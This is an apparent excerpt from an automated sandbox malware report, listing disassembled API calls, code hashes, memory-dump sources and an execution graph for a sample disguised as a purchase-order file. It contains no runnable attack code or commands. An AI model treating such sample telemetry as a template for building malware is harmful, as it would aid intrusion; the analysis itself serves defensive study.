                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                                                                                                                      • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000008,?,?,02C115D8,02C13CBB,?,02C11D2A,?,?,00000000), ref: 02C118E4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C11919
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C11940
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,02C11D2A,?,?,00000000), ref: 02C1194D
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,02C11D2A,?,?,00000000), ref: 02C11956
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                      • Opcode ID: ca3e16a45a4dfcf1c517af63d36b97c7b9115a69a0521b46cc50a0192aecd61a
                                                                                                                                                                                                                                      • Instruction ID: d475260ed234c49a5b35f9e01ac6e862d745f6dfd49b54eb668bcf089c6d927c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca3e16a45a4dfcf1c517af63d36b97c7b9115a69a0521b46cc50a0192aecd61a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201493A140611AFD31225316C87F3B136EABC7274B290625FF2DE2245FFA98511F451
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(03421660), ref: 00414050
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C13189
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1319B
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C131AD
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C131BF
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C131D1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: d001312c22ab98564c8a7eec32aca261492481262b99aae97fea64c4b9e84bc6
                                                                                                                                                                                                                                      • Instruction ID: 48e19b73294570abe38aa11ed70c132e9605f019dc5b71d32bee065c72948cb3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d001312c22ab98564c8a7eec32aca261492481262b99aae97fea64c4b9e84bc6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93F06233944250AFCB31DA64FC86D1673DEBA823297640D49F80DD7604CB30F990FAA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                                                                                                                      • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                                                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02C1354C
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02C135D5
                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02C135E7
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 02C135F0
                                                                                                                                                                                                                                        • Part of subcall function 02C132FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02C1332C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                                      • Opcode ID: 0dd8afe1a29e4b49ddcbf9625dc179e34f33ba8d7ddf4967cc597731b930aa59
                                                                                                                                                                                                                                      • Instruction ID: f3608ed14c32a8074c2e7f41ce4649e1bef28fc393c3fee8de2421e91ebc25ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dd8afe1a29e4b49ddcbf9625dc179e34f33ba8d7ddf4967cc597731b930aa59
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31167290024A9BDF25DF64CC42DAF7BA6EF42718F1401A8EC04D7290E735CA54EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02C115D8,00000000,00000000,?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue), ref: 02C121BD
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue,02C26FC4,FlsSetValue,00000000,00000364,?,02C1192D), ref: 02C121C9
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue,02C26FC4,FlsSetValue,00000000), ref: 02C121D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: db0250b924291f3a86b90eae426e1b382944f0f3922e6a68cf7d55009cbcd455
                                                                                                                                                                                                                                      • Instruction ID: 8f727ee585650a6f34bd70ef90bd8a6578ea030f0f1f9ec3a603563071e900b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db0250b924291f3a86b90eae426e1b382944f0f3922e6a68cf7d55009cbcd455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC018876A822329BC7318A79DC46B567B98AB47B617310B20EE15D7140D720D911D6F1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                      • API String ID: 0-2276729525
                                                                                                                                                                                                                                      • Opcode ID: ea5511959172023246e4a43610310effd32ea8e343302847d4f451617e9e9a44
                                                                                                                                                                                                                                      • Instruction ID: f7c5f48b4f93f520d07158e4cc2b2c8704e904a8f6fb608f42ae0fee06c5cbcb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea5511959172023246e4a43610310effd32ea8e343302847d4f451617e9e9a44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08519F71E1860186CB35BB14C98337A77A0EBC1740F288D1CE9D9426D8EF7985E5EE83

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:8.1%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:93
                                                                                                                                                                                                                                      Total number of Limit Nodes:9
                                                                                                                                                                                                                                      execution_graph 38983 558b8a8 38984 558b8f6 DrawTextExW 38983->38984 38986 558b94e 38984->38986 38987 12dd01c 38988 12dd034 38987->38988 38989 12dd08e 38988->38989 38994 5583954 38988->38994 39003 5585aa8 38988->39003 39012 5584d48 38988->39012 39016 5584d37 38988->39016 38995 558395f 38994->38995 38996 5585b19 38995->38996 38998 5585b09 38995->38998 38999 5585b17 38996->38999 39036 5583a7c 38996->39036 39020 5585d0c 38998->39020 39026 5585c31 38998->39026 39031 5585c40 38998->39031 39006 5585ae5 39003->39006 39004 5585b19 39005 5583a7c 2 API calls 39004->39005 39008 5585b17 39004->39008 39005->39008 39006->39004 39007 5585b09 39006->39007 39009 5585d0c 2 API calls 39007->39009 39010 5585c40 2 API calls 39007->39010 39011 5585c31 2 API calls 39007->39011 39009->39008 39010->39008 39011->39008 39013 5584d6e 39012->39013 39014 5583954 2 API calls 39013->39014 39015 5584d8f 39014->39015 39015->38989 39017 5584d48 39016->39017 39018 5583954 2 API calls 39017->39018 39019 5584d8f 39018->39019 39019->38989 39021 5585cca 39020->39021 39022 5585d1a 39020->39022 39043 5585cf8 39021->39043 39046 5585ce7 39021->39046 39023 5585ce0 39023->38999 39028 5585c54 39026->39028 39027 5585ce0 39027->38999 39029 5585cf8 2 API calls 39028->39029 39030 5585ce7 2 API calls 39028->39030 39029->39027 39030->39027 39033 5585c54 39031->39033 39032 5585ce0 39032->38999 39034 5585cf8 2 API calls 39033->39034 39035 5585ce7 2 API calls 39033->39035 39034->39032 39035->39032 39037 5583a87 39036->39037 39038 558724c 39037->39038 39039 55871a2 39037->39039 39040 5583954 CallWindowProcW 39038->39040 39041 55871fa CallWindowProcW 39039->39041 39042 55871a9 39039->39042 39040->39042 39041->39042 39042->38999 39044 5585d09 39043->39044 39051 5587132 39043->39051 39044->39023 39047 5585cf2 39046->39047 39048 5585d58 39046->39048 39049 5585d09 39047->39049 39050 5587132 2 API calls 39047->39050 39049->39023 39050->39049 39052 558713b 39051->39052 39053 558718c 39051->39053 39054 5583a7c CallWindowProcW 39052->39054 39055 558724c 39053->39055 39056 55871a2 39053->39056 39058 558714a 39054->39058 39057 5583954 CallWindowProcW 39055->39057 39059 55871fa CallWindowProcW 39056->39059 39060 55871a9 39056->39060 39057->39060 39058->39044 39059->39060 39060->39044 38962 132e260 38963 132e2a2 38962->38963 38964 132e2a8 GetModuleHandleW 38962->38964 38963->38964 38965 132e2d5 38964->38965 38958 5584b90 38959 5584bf8 CreateWindowExW 38958->38959 38961 5584cb4 38959->38961 38966 13271d8 38967 13271fd 38966->38967 38971 13272db 38967->38971 38975 13272e8 38967->38975 38972 132730f 38971->38972 38973 13273ec 38972->38973 38979 1326ecc 38972->38979 38976 132730f 38975->38976 38977 13273ec 38976->38977 38978 1326ecc CreateActCtxA 38976->38978 38978->38977 38980 1328778 CreateActCtxA 38979->38980 38982 132883b 38980->38982 39061 94333b8 39062 9433543 39061->39062 39063 94333de 39061->39063 39063->39062 39066 9433632 39063->39066 39069 9433669 PostMessageW 39063->39069 39067 9433669 PostMessageW 39066->39067 39068 94336a4 39067->39068 39068->39063 39070 94336a4 39069->39070 39070->39063

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1176 5584b85-5584bf6 1177 5584bf8-5584bfe 1176->1177 1178 5584c01-5584c08 1176->1178 1177->1178 1179 5584c0a-5584c10 1178->1179 1180 5584c13-5584c4b 1178->1180 1179->1180 1181 5584c53-5584cb2 CreateWindowExW 1180->1181 1182 5584cbb-5584cf3 1181->1182 1183 5584cb4-5584cba 1181->1183 1187 5584d00 1182->1187 1188 5584cf5-5584cf8 1182->1188 1183->1182 1189 5584d01 1187->1189 1188->1187 1189->1189
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05584CA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                                                      • String ID:
